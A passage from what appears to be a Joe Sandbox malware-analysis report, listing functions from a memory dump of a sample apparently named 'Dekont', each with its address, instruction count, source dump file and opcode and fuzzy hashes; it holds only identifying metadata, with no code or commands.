                                  • Instruction ID: 896eb60730d7dba515e245ffb58474c833e54f0aa010efede8e068dad542e0ad
                                  • Opcode Fuzzy Hash: c84d97e87b826dfa5295c7b85c94afc37dece304cdc921acc383707327504062
                                  • Instruction Fuzzy Hash: F841DF71201B45DFD722CF28C881BD67BE9BF49714F15846AF6998B351C774E800EB50
                                  Function 01084BB0 Relevance: .1, Instructions: 101COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bd4b2c2ec93d5f59a045da614996574462cb31d1fdf56c341e2d178c5c89035
                                  • Instruction ID: f210642940868639faf812978dc8bc76548c19fa0b2d8babd6cadbf62e7e1fd1
                                  • Opcode Fuzzy Hash: 4bd4b2c2ec93d5f59a045da614996574462cb31d1fdf56c341e2d178c5c89035
                                  • Instruction Fuzzy Hash: 76316A716083068FD360EF29C881B6AB7E9FB84720F0A456DF9D5DB391E731E8048B91
                                  Function 0104EB1D Relevance: .1, Instructions: 100COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9faf8cbe77df5390fb70a3bedc075a0af6ebf82272c69756620f8599e52dfbd
                                  • Instruction ID: 4b20455645c40a2f5c912cbdd82bcd45b11343171a3a367a159d4d44f44cb751
                                  • Opcode Fuzzy Hash: f9faf8cbe77df5390fb70a3bedc075a0af6ebf82272c69756620f8599e52dfbd
                                  • Instruction Fuzzy Hash: 9D31AFB17016C9ABF332576DCD88B6A7BD8BB41B44F1904F0ABC59B6D2DB2CD841C264
                                  Function 010961C3 Relevance: .1, Instructions: 97COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4f4594ac1726b81f9a7c478c2c4f5e33ddd26653720d67365c48e23c88a02a6
                                  • Instruction ID: 408aa5ee71d4369480edc9f94f2f585063c6800daf96b0bd52b707d9f2da092f
                                  • Opcode Fuzzy Hash: a4f4594ac1726b81f9a7c478c2c4f5e33ddd26653720d67365c48e23c88a02a6
                                  • Instruction Fuzzy Hash: 5C310175A0061AABDB15CF98CC50BAEB7B5FB44B40F4041A9E940EB244D770ED00CBA0
                                  Function 0107483A Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 320ff84479ecbf59f2fdfae817cee885a5b61ce61e4ef4ef9e2f3b8cdebb6472
                                  • Instruction ID: 25198dd37fafb2924748f5f95cf7043295e95c61f2df8566e4ec9aac09fe92e1
                                  • Opcode Fuzzy Hash: 320ff84479ecbf59f2fdfae817cee885a5b61ce61e4ef4ef9e2f3b8cdebb6472
                                  • Instruction Fuzzy Hash: B1315376E4012DABCB61DF54DC88BDEBBFAAB98350F1500E5A548E7250CB34DE918F90
                                  Function 00FFEB20 Relevance: .1, Instructions: 96COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: defb6190c2f446d4c18d7ff0300ca8687511a8e895c78d601028fd2047a47b58
                                  • Instruction ID: 64b4cfa19c4d230cf591d10a8686db7119748429d91aa804a494a66927db1f37
                                  • Opcode Fuzzy Hash: defb6190c2f446d4c18d7ff0300ca8687511a8e895c78d601028fd2047a47b58
                                  • Instruction Fuzzy Hash: 1F31F732E00219AFDB21DFA9CC44BAEB7F9EF84750F104066E656E7270D2749E00AB90
                                  Function 010960B8 Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 89fc358d75c950d4803b58e6d64378cbb209ba3a24fd83dd06f453a8939957a9
                                  • Instruction ID: 6c0aef30d99de814032dac08e4e0c88e2f55c436d940d90b56398380128f0cd4
                                  • Opcode Fuzzy Hash: 89fc358d75c950d4803b58e6d64378cbb209ba3a24fd83dd06f453a8939957a9
                                  • Instruction Fuzzy Hash: 573124B1A00201AFDF229FA9CC60B6FB7F9AF84750F044069F581DB392DA32DC009B90
                                  Function 00FD07AF Relevance: .1, Instructions: 95COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9280fbcc7addd428dcfffdb953fbd098297a6d83c5b84dc8de092a8ef04d2e32
                                  • Instruction ID: 52b81d4af9702364ce6a4a01d0a6d9777993f10ac75469bec85e189234f0df59
                                  • Opcode Fuzzy Hash: 9280fbcc7addd428dcfffdb953fbd098297a6d83c5b84dc8de092a8ef04d2e32
                                  • Instruction Fuzzy Hash: 4331D132A04212DBC722DE64C884F6BBBA6AF84360F19452AFC55A7311DE34DC01B7E1
                                  Function 00FD8550 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0fc003a226fe33f4ec123cb3cbdf90e7901cb40fbe1a6f90bfd41f1d338222b
                                  • Instruction ID: 36b203d4b744f3d8e2c4d00d6391c78dc6ad1dbb7911008ab6069f81e751aef3
                                  • Opcode Fuzzy Hash: d0fc003a226fe33f4ec123cb3cbdf90e7901cb40fbe1a6f90bfd41f1d338222b
                                  • Instruction Fuzzy Hash: D4316D726093018FE360CF19D840B2AF7EAEF88750F19496EF98497351D775E848DB91
                                  Function 0100A6C7 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                  • Instruction ID: c471cec4c5c7fc7e714c468a5f20c2299680036e2d32711db17bfa8c4bdb62f9
                                  • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                  • Instruction Fuzzy Hash: 81312CB2B00B01EFE765CF69CD41B57BBF8BB08A50F14456DA59AC3691E630E9008B60
                                  Function 0107EBD0 Relevance: .1, Instructions: 91COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 87c2431359245ae37de8ccfbc40f727d0803315d682ec4820fbdb483f4cedc6c
                                  • Instruction ID: c11f7a9d3242f6cd61fe61d6e78a86fd956bb0d8cf2fe9804f4a4f00ae75c277
                                  • Opcode Fuzzy Hash: 87c2431359245ae37de8ccfbc40f727d0803315d682ec4820fbdb483f4cedc6c
                                  • Instruction Fuzzy Hash: BF31A7B59063458FC721DF19C54085ABBE9FB89604F048AEEE4C89B252E3319942CF96
                                  Function 00FF438F Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bfc7c50ef50731b47edfa2f17359aba59b17ad464e416fcc989738db5bcd402
                                  • Instruction ID: ed9430b9571e740703441222401961eb46be8d49556bdfb9d23d4ab7a11157e1
                                  • Opcode Fuzzy Hash: 2bfc7c50ef50731b47edfa2f17359aba59b17ad464e416fcc989738db5bcd402
                                  • Instruction Fuzzy Hash: 9831B132B002099FD720EFA9C981B7FB7F9AF84704F108529E645E72A5D734E945EB90
                                  Function 00FCCB7E Relevance: .1, Instructions: 89COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                  • Instruction ID: 4f6067f6433f4b8007d2d2edfa068bad9ebac908c1ce75dee24cce2254c8e171
                                  • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                  • Instruction Fuzzy Hash: C8212736E0026BAAD700DBB98802BAFBBB5AF40750F058075EA59F7240E670C90097E0
                                  Function 00FCC156 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 070c13953961d4ea97f49441dd253a1e8dc0ca1dc4072bf9b836edc27d2a68ec
                                  • Instruction ID: 4c97f482e4c91d025eae1339706128f6c7bb97a5f5a2bd7c27d946624beda868
                                  • Opcode Fuzzy Hash: 070c13953961d4ea97f49441dd253a1e8dc0ca1dc4072bf9b836edc27d2a68ec
                                  • Instruction Fuzzy Hash: D33167725002108BD731EF68CC45BA877B4BF44304F5881A9E9C99B382EA39DD82DB90
                                  Function 0108C3CD Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                  • Instruction ID: d4ca9f3cf82d98849bad6f181af1735bb48afc5a59d8d2ea916e7d7a038cc2a2
                                  • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                  • Instruction Fuzzy Hash: 92212B36604652A6EB15BBD98D00AFABBB5EF40720F40901BFAD587691EB38DD80C370
                                  Function 00FCE420 Relevance: .1, Instructions: 88COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 12d45209f9b2dbef3a14060e88e6327864dd700c689a578c6751dda73811880c
                                  • Instruction ID: d98d234217b23363a3398de56e5d64b929c1c0ab4ef8b0266d76433b1ddbddeb
                                  • Opcode Fuzzy Hash: 12d45209f9b2dbef3a14060e88e6327864dd700c689a578c6751dda73811880c
                                  • Instruction Fuzzy Hash: 69313536A0012D9BDB35DF14CD43FEEB7B9EB14750F0000A9E685E7290D6789E80AF90
                                  Function 01004588 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                  • Instruction ID: 9ea31648bf5951f3b5068112a79cbb4ca91a70aff43da187ea4d03acfe4b06b3
                                  • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                  • Instruction Fuzzy Hash: 63219131A00A09EFDB12CF98C980A8EBBF5FF48714F108165EE55DB281E671EA058B94
                                  Function 010044B0 Relevance: .1, Instructions: 87COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c01b329854c45c0572e2b8ab1210d74cfabcfc8999e00411b7ffd07b639446e2
                                  • Instruction ID: 681365b652d0e61a367c4102fa6018252961dce1f323fd4e6cefa0dcab046392
                                  • Opcode Fuzzy Hash: c01b329854c45c0572e2b8ab1210d74cfabcfc8999e00411b7ffd07b639446e2
                                  • Instruction Fuzzy Hash: 4821F7725047459BD722CF18D881B6B77E4FF88751F014569FE849B282C735D900CB92
                                  Function 00FCE388 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                  • Instruction ID: b8f695cfffa4254924f84dff5365aa9eb1f133119b0d12c57795476e5a8a0540
                                  • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                  • Instruction Fuzzy Hash: 7431CB32600649EFD721CFA8C985F6AB7F9EF84314F2045A9E582CB280E730EE01DB50
                                  Function 0104E609 Relevance: .1, Instructions: 86COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a97a9b0b5ea53231c07ab1e46ca170cdb474dfaf4a7fbfc765f1a3dfbe3bc490
                                  • Instruction ID: 52fc2bf7e33e5d5cccc62eab982cfca65818e772ddfa80841c79194742d5664e
                                  • Opcode Fuzzy Hash: a97a9b0b5ea53231c07ab1e46ca170cdb474dfaf4a7fbfc765f1a3dfbe3bc490
                                  • Instruction Fuzzy Hash: 44315EB9A002059FCB14CF1CC8849AEB7B6FF88344F15846AE8859B391E775EA50CB94
                                  Function 010506F1 Relevance: .1, Instructions: 79COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75654948ccd967895296f26db5f194e72869c9e9e974ef40c77f26652810bf2c
                                  • Instruction ID: 19e94af313ce060605b402903c20e993f7aab461faf5993376d197a033073a7e
                                  • Opcode Fuzzy Hash: 75654948ccd967895296f26db5f194e72869c9e9e974ef40c77f26652810bf2c
                                  • Instruction Fuzzy Hash: E221AD71A002299BCF64DF59C881ABEB7F8FF48740B500069F981AB244E738AD41DFA0
                                  Function 0105019F Relevance: .1, Instructions: 78COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee202c57cdd1aa42e11a14a0d664a5c1e6cf0ea2e3a1694a9e1c5f5895f36c1f
                                  • Instruction ID: e0450051a600894da1cd813964e16261bff5f71a7de8cb6d179eccd4765f225b
                                  • Opcode Fuzzy Hash: ee202c57cdd1aa42e11a14a0d664a5c1e6cf0ea2e3a1694a9e1c5f5895f36c1f
                                  • Instruction Fuzzy Hash: 49217C71600644AFD715DB6DDD44F6AB7E8FF88780F1400A9F944DB691D638EE40CB68
                                  Function 01050283 Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7995bcc8a756a56d2475786b9d9ccd56dae07b0a88ea380721d2c183f052388c
                                  • Instruction ID: edcb2a4e841680ba2978f0f0463327772f1d9099108e5ca6b3b328e6686d0cba
                                  • Opcode Fuzzy Hash: 7995bcc8a756a56d2475786b9d9ccd56dae07b0a88ea380721d2c183f052388c
                                  • Instruction Fuzzy Hash: 0621C1725042859BD761DF69DC48B6FBBECAF80340F084496BDC087266D734DA04C6A1
                                  Function 00FF2835 Relevance: .1, Instructions: 73COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e856e8003a55adc69ca799402c9c5c63734fce6f4df8e387656c940d52da2a9
                                  • Instruction ID: 1da253c438e045bd4a80158605b7ab1e60574cf7da32c773c13d1e6b0453ae89
                                  • Opcode Fuzzy Hash: 3e856e8003a55adc69ca799402c9c5c63734fce6f4df8e387656c940d52da2a9
                                  • Instruction Fuzzy Hash: 2E21DA32745689DBE322676CCD0CB2537D5AF81B74F2903A5FAA19B6E2D76CC801D210
                                  Function 0100A30B Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b54150d7562753d7fe3111e574a0805238e821b4c03d7ec7c3b6909f942ce93
                                  • Instruction ID: 8255cedbe734d3d97ce3f4b3c0097a0f706af727329c023e783e98131ce7ac83
                                  • Opcode Fuzzy Hash: 1b54150d7562753d7fe3111e574a0805238e821b4c03d7ec7c3b6909f942ce93
                                  • Instruction Fuzzy Hash: 9D219875200B40DFC725DF29CC41B5AB7F5AF08B04F2484A8A589DBB62E336E942CF94
                                  Function 01050946 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bc6f15056dc6824a9c078ab507cf09eef4c1de6fbc420033a4adb3bc42671b8c
                                  • Instruction ID: 9c3acf0a1d4a659083479c2d89271443271d6a654d95944eceb43b1b6532d124
                                  • Opcode Fuzzy Hash: bc6f15056dc6824a9c078ab507cf09eef4c1de6fbc420033a4adb3bc42671b8c
                                  • Instruction Fuzzy Hash: AF2105B1E00249ABCB60DFAAD981AAEFBF8FF98700F10412EE445E7254DA749941CF50
                                  Function 010680A8 Relevance: .1, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction ID: 2582eb743e093f45121a204ac46dae35ee6ecf061b7595547dc2253041c9788c
                                  • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                  • Instruction Fuzzy Hash: 28215E72A00209EFDF129F98CC44BAEBBFDEF88310F204456F955A7251D774D9519B50
                                  Function 01000124 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction ID: 6aeb092ab7054a6817916485b6c74f68875a3f1a0a13e638ff7f900abdf7f1f6
                                  • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                  • Instruction Fuzzy Hash: AA11EF72641605AFF7239B48CC41FEABBB9EB80794F104069F6448B1C0D671EE44DB60
                                  Function 00FD8770 Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9812ebcb3af0ef958e9fc1fb1a9f0f1b26c6afb333eec30a5dbbd42a87a198b0
                                  • Instruction ID: 49315ca1b39977d022fc786b5e89c562dfcde6aeb9689f328c37c5e14024ef8e
                                  • Opcode Fuzzy Hash: 9812ebcb3af0ef958e9fc1fb1a9f0f1b26c6afb333eec30a5dbbd42a87a198b0
                                  • Instruction Fuzzy Hash: 09119835B016119BCB11CF4AC5C0A5AB7EBAF46BA072C406FED099F305DAB2DD02D790
                                  Function 0100AAEE Relevance: .1, Instructions: 68COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction ID: 585eaa0f033d7f37d357b5b65d884d0c4d8234aa709541aef32e848b739310cc
                                  • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                  • Instruction Fuzzy Hash: 13217972A00B40DFE7228F5DC544B6ABBE6EB84B50F1489BDE58A97652C734ED01DB80
                                  Function 00FD80E9 Relevance: .1, Instructions: 66COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 06b1c05e26ec7da9d4139fbd8cbd0f2935e3ad2d15c649c2e20f91b2f8fae0af
                                  • Instruction ID: 17ba30e74dddca29c2cd9d22d3af69145d91407bacdaad9fc6c40a9359e25f1a
                                  • Opcode Fuzzy Hash: 06b1c05e26ec7da9d4139fbd8cbd0f2935e3ad2d15c649c2e20f91b2f8fae0af
                                  • Instruction Fuzzy Hash: 6F215E76A00205DFCB14CF58C581B6EBBB6FB88758F24416ED105A7350CB71AD0BDB90
                                  Function 0100674D Relevance: .1, Instructions: 65COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a61bfff1d76b8d800a03c2d1d965e0b874d1cf6749351b70bc2922e9c11c339a
                                  • Instruction ID: fc76d22685e8a33d4ca9a89b27c1582a520dd3be3ea635d43cf7d020f0751eee
                                  • Opcode Fuzzy Hash: a61bfff1d76b8d800a03c2d1d965e0b874d1cf6749351b70bc2922e9c11c339a
                                  • Instruction Fuzzy Hash: F5219D71600A00EFE7618F69C881F6AB7F9FF84750F04882DE5DEC7291DA31A960CB61
                                  Function 00FFE8C0 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14364f871f5c49e2f9ce75104115f679216012918a6bebeddae03e4926556676
                                  • Instruction ID: cfb5ea8792f6d8729b41cda8c721df1e3fa76bd947dc0e9eb898e156d2ac7b79
                                  • Opcode Fuzzy Hash: 14364f871f5c49e2f9ce75104115f679216012918a6bebeddae03e4926556676
                                  • Instruction Fuzzy Hash: 291129336001145BCB29DB29CC45A7F725BEFD1770B244529E6228B3A0E931C811C691
                                  Function 01066870 Relevance: .1, Instructions: 63COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3aa0949e95894d183702e6aea197a40c34245cd54ebf5eaf9fa2eb61b5087f69
